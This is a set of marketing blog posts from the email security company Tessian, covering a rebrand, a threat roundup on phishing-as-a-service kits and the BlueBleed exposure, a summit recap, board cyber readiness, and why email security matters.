Darker tones and more harmonious colors are now utilized in our new color palette. We wanted a color palette that you can relate to while feeling assured, yet also colors that appear serious but still approachable. We can distinguish between good and bad by using a straightforward red and blue combination, which we will then emphasize with a simple white and gray background. Finally, the keen eyed among you might even notice a subtle difference in our logo. While we wanted to keep the identity our logo gives us, we also wanted it to reflect the sharpness we have in detecting and preventing cyber-attacks. Our mission to Secure the Human Layer Gartner stated in the 2021 Market Guide for Email Security that customers are now looking for solutions that integrate directly into cloud email via an API, rather than as a gateway and that a behavioral approach is needed for both threat protection and data protection on email. That’s why we’re building intelligent security that works for human beings as they are, not how security policies would like them to be. Using machine learning technology, Tessian automatically predicts and eliminates advanced threats on email caused by human error – like data exfiltration, accidental data loss, business email compromise and phishing attacks – with minimal disruption to employees’ workflow. As a result, employees are empowered by security. Our new brand encompasses our mission and approach to security, however since the company started we never shy away from the hard problems to solve. We put our customers’ problems at the heart of everything we do and intelligently solve them.  
Read Blog Post
Threat Stories, Advanced Email Threats
Tessian Threat Intel Roundup: Advanced Phishing Attacks
by Monday, October 31st, 2022
On the back of Cybersecurity Awareness Month in October 2022 with key recommendations to protect against phishing attacks, we delve deeper into the latest Phishing-as-a-Service offering known as Caffeine, first identified by Mandiant. We also unpack an impersonation campaign we identified in the wild called Logokit. And in other notable news, a misconfigured Microsoft endpoint storage vulnerability dubbed BlueBleed was exposed by researchers at SOCRadar, potentially exposing sensitive data for thousands of customers. Sign-up for our Threat Intel update to get this monthly update straight to your inbox.     • Phishing-as-a-Service (PhaaS) is now sold alongside Ransomware-as-a-Service (RaaS) on the dark web.  • The commercialization of these PhaaS exploit kits and threat actors’ services are removing the barriers to entry for carrying out attacks, at scale.  • The most recent offering is the so-called Caffeine PhaaS exploit kit that enables anyone to procure the kit and launch phishing attacks against Microsoft 365 targets.  • Tessian Threat Intel recently identified a Business Email Compromise (BEC) campaign in the wild called Logokit. • Logokit uses randomized spoofed pages and brand logos for purposes of harvesting login credentials. In one instance we found that a spoofed version of a Microsoft login page was being used in an attempt to capture credentials. • Researchers from SOCRadar identified six misconfigured Azure buckets which it has dubbed BlueBleed. • The BlueBleed exposure according to SocRadar is among the most significant B2B leaks ever, exposing sensitive data of 65,000 entities across 111 countries.  • Microsoft immediately rectified the privacy settings on the exposed buckets, thanking SOCRadar, however disputing the extent of the exposure.
Phishing remains a persistent threat and security challenge. Threat actors continue having significant success using social engineering attacks to compromise organizations. And there is no silver bullet to protect against social engineering attacks.    Only by adopting a multi-pronged, defense-in-depth security strategy will the risk of a social-engineering-related breach be reduced. Utilizing a best-in-breed solution that has advanced social engineering defense capabilities and that reinforces security culture strengthening like Tessian is increasingly essential to address an ever-evolving threatsc
To see how Tessian prevents ransomware attacks, and protects against DLP, watch a product overview video or book a demo. For the latest cybersecurity news and articles, sign up for our newsletter, and follow us on Twitter and LinkedIn
Read Blog Post
Interviews With CISOs
Watch Again: Fwd: Thinking – The Intelligent Security Summit
by Andrew Webb Thursday, October 27th, 2022
If you missed Fwd: Thinking – The Intelligent Security Summit, don’t worry. We have every session available on demand right here. You can also watch past sessions of previous Tessian summits over on our knowledge hub. Five Email Security Stats You Don’t Already Know (But Wish You Did) The summit kicked off with Tessian’s John Filitz in conversation with Ram Ganeshanathan — VP of Enterprise Security at Arm, and Anuj Tewari, CISO at  TMF Group. Together they discussed the findings from our latest State of Email Security Report, comprising global research into email security trends for 2022. The panel then revealed where your focus should be as we head toward 2023.   The Growing Threat of Impersonation and Account Takeover Attacks Impersonation and Account Takeover (ATO) attacks are the leading threat vectors that result in Business Email Compromise (BEC) and represent among the greatest cybersecurity threats to enterprises. In this session, Tessian’s Paul Laudanski is joined by David Kennedy – CEO and Ethical Hacker at TrustedSec, James Fernley –  Head of IT Security, BDO UK, and Jason Thomas — CIO, Cole, Scott and Kissane for a lively discussion on the growing threat of account takeover attacks, and how to mitigate them.    Making the Case for Cybersecurity Spend? What’s the risk really worth? We need to talk about risk. And you can’t talk about risk without talking about spending. It’s a fact that as companies think about growing efficiently, security is often bumped down the agenda. Nate Tombs, CISO at Man Group, Marco Garcia, Field CTO at Torq and Tessian‘s Josh Yavor explore how to prioritize cyber risk as a business risk and explain how to demonstrate ROI so that all business leaders can speak the same language and avoid that worst case scenario. Isn’t Security Everyone’s Responsibility?  Fact: Your end users don’t really care about cybersecurity. Our recent Security Cultures report found that 1 in 3 workers do not think they play a role in maintaining their company’s cybersecurity posture while only 36% say they’re paying full attention to security awareness training. Ash Hunt – Group Head of Information Security at Sanne Group, Imraan Dawood – Information Security Officer, Investec and Tessian’s Kim Burton take a look at why this is and what a better approach to building a stronger security culture looks like.   Lessons Learned on the journey to a Machine Learning Platform Tessian is built on machine learning and artificial intelligence. In this session, Daniel Linder — Senior Director of Data Science at Tessian, takes you on the journey of building a Machine Learning system in the InfoSec world. You’ll also get to peek behind the curtain into building and scaling a team of data scientists and engineers, as well as some practical tips on how to apply machine learning  in ways that are most impactful now, and not in 10 years’ time.     How to Survive and Thrive in Cybersecurity Finally, we were delighted to welcome our keynote speaker and guest, Helen Rabe, CISO at the BBC. Large enterprises like the BBC are high-value targets for attackers, in this wide-ranging talk, Helen explains her approach to cybersecurity and details what it takes to be a successful and savvy security leader.   
To see how Tessian prevents ransomware attacks, and protects against DLP, watch a product overview video or book a demo. For the latest cybersecurity news and articles, sign up for our newsletter, and follow us on Twitter and LinkedIn
Read Blog Post
Advanced Email Threats
Board Members Believe Their Companies Are Unprepared For A Cyberattack
by Andrew Webb Friday, October 21st, 2022
As our recent webinar discussed, cybersecurity has become a C-suite issue. Any successful attack will need input from all its executive members: the CEO for steadying the ship and communicating to investors and the Board, the CISO, CIO, CFO and COO to respond and deal with the actual breach and ensure business continuity. Then there also is the fine balancing act of strategic PR and media communications. Consequently, cyberattack resilience and response should be on the agenda of every company’s monthly or quarterly Board meeting. Boards can provide the oversight companies need in planning and executing their security strategy. Because and although Board members might not always understand the technical fundamentals of cybersecurity, recent headlines mean they at least understand the financial implications of a cybersecurity breach. So it’s all roses, right? Well not so much. A recent report from MIT Sloan and Proofpoint reveals that many Board members feel their companies are woefully under-prepared for a cyberattack. What’s more, there is a large disconnect between what the Board wants to prioritize and what Chief Information Security Officers (CISOs) view as important. Here then, are some of the key takeouts.
First the good news: The report found that 77% of Board members agree that cybersecurity is a top priority for their board. Now the not-so-good news. Although most Board members are aware of the risk of cyber attacks, that hasn’t translated into preparedness. Forty-seven percent of all Board members believe that their organization is unprepared for a cyber attack, and about the same amount of CISOs agree. As discussed, CISOs & Board Members disagree on the most critical consequences of a cybersecurity incident. Internal data becoming public is of the most concern for boards while CISOs are more worried about significant downtime and disruption of operations. In reality, both are a problem for organizations. The report specifically highlights the Board’s approach to the number one cause of cyber attacks. Two-thirds (67%) believe human error is their biggest cyber vulnerability and notes that ‘… people throughout the organization, including board members, know what to watch for and what to do should they encounter a questionable email, link or website. Board members have both a personal and professional role to play. They, too, can be targets of cyber criminals who want to get into companies. We’ve seen this across many senior levels in organizations: where the c-suite themselves are at much higher risk of an attack than many ordinary employees because they rely much more on power dynamics. So what’s the answer to this mismatch between the Board, the C-suite, and the CISO?
Firstly, as the report notes, Board members in most countries had markedly different perceptions of cyber risk than their CISOs. That can be addressed through dialogue and better communication. Crucially though, those conversations must approach the issue from a business angle, rather than purely a technological one.  Secondly, on the human error piece, CISOs must put in place not only technological solutions, but also the cultural framework that makes security an ‘always on’ issue for the company and staff. We addressed exactly this aspect in our recent Security Cultures Report, which offers advice on how to bake better security awareness into your staff’s day-to-day routine.  Thirdly, harness the power of the Board. If leaders and parts of the business see cybersecurity as a top priority for the Board, then they’ll do the same. One easy way to do this is to make cybersecurity an agenda item at every monthly or quarterly Board meeting, and establish good cyber metrics to help track your progress.
Read Blog Post
Insider Risks, Email DLP, Advanced Email Threats
What is email security and why it’s important
by Thursday, October 20th, 2022
Fact: email is responsible for up to 90% of breaches, consequently email security is at the core of keeping your organization and its data safe and secure. As cyber risk continues to increase, having robust email threat prevention in place can mean the difference of preventing threat actors from gaining a foothold and establishing initial access. It can also provide critical visibility and control over data within the organization, significantly reducing insider risk. Why email security deserves greater attention It might seem like a basic question, but when you drill into what email security is and what it entails, it is fundamentally about data security. With the typical organization sending and receiving hundreds and thousands of emails on a monthly basis, explains why email is regarded as the lifeblood of organizations.  From a security standpoint, given the critical data transportation role played by email, helps explain why email security is increasingly being regarded as one of the cornerstones of data security.  Another security consideration is the open architecture character of email – making email an accessible attack vector. Anyone can send an email to any individual or organization making the threat vector extremely attractive to exploit. Want to email the CEO of a company? Their name is probably in the public domain and so their email is likely to be firstname.lastname@companyname.com  or some combination thereof.
Email cyber risks are increasing  The open nature of email explains why threat actors are continuously at work in developing email-based social engineering campaigns. These campaigns are developed by using open-source information sources such as social media accounts, company PR statements and news mentions.  Recent research also points to threat actors mining dark web data dumps obtained from previous breaches for personally identifiable information (PII) to be used in impersonation campaigns.  Another attack vector that is gaining prominence is credential related compromises. A credential compromise that leads to an account takeover (ATO) of a vendor in the supply chain or even an internal email account is particularly challenging to detect.  Threat actors typically leverage ATO for purposes of carrying out second stage attacks that can include email requests for invoices to be paid (invoice fraud), or delivering a malicious payload via email. Insider threats within organizations present another threat vector on email. In fact, until the recent roll-out of behavioral-based data loss prevention (DLP), being able to detect and prevent data loss on email was near impossible. The challenge with data loss on email is that it can occur in a multitude of seemingly innocuous ways, for example, an employee attaching the incorrect file and sending this out via email, or sending the email to the unintended recipient. More malicious acts of insider threat could include a disgruntled employee that exfiltrates sensitive company data via email, or a threat actor that has gained access via an impersonation or ATO attack.
Rule-based solutions no longer provide adequate protection Threat actors can bypass rule-based email security controls like Secure Email Gateways (SEGs) that rely on a threat detection engine of already documented indicators of compromise. This results in effectively chancing your email security on threat detection approach of established indicators of compromise – with no protective capability against zero day attacks. We know that threat actors don’t work this way.  Threat actors are continuously refining their attack campaigns. The result is that attack social engineering campaigns are becoming ever-more sophisticated and are increasingly able to bypass rule-based detection systems.  Some of the tried and tested methods for compromise include creating spoofed domains, leveraging compromised accounts, as well as procuring a wide-array of exploit kits on the dark web.  Phishing-as-a-Service (PhaaS) is now sold alongside Ransomware-as-a-Service (RaaS) on the dark web. The commercialization of these exploit kits and threat actors services are removing the barriers to entry for carrying out attacks.  On the PhaaS front, the most recent offering is the so-called Caffeine PhaaS exploit kit that enables anyone to procure the kit and launch phishing attacks against targets. The service offering includes pre-built phishing templates, available in multiple languages. 
The time for advanced email protection is now  No organization can afford to neglect increasing email security risk. Only by leveraging behavioral based cybersecurity solutions will advanced email attacks be detected and prevented. This includes insider threats that leads to data loss.  Tessian’s Intelligent Cloud Email Security Platform has behavioral intelligence at its core – using Natural Language Processing (NLP) and Natural Language Understanding (NLU) – to detect advanced external and internal threats, as they manifest and in real-time. This includes threats that have been able to circumvent rule-based security controls such as SEGs.
Read Blog Post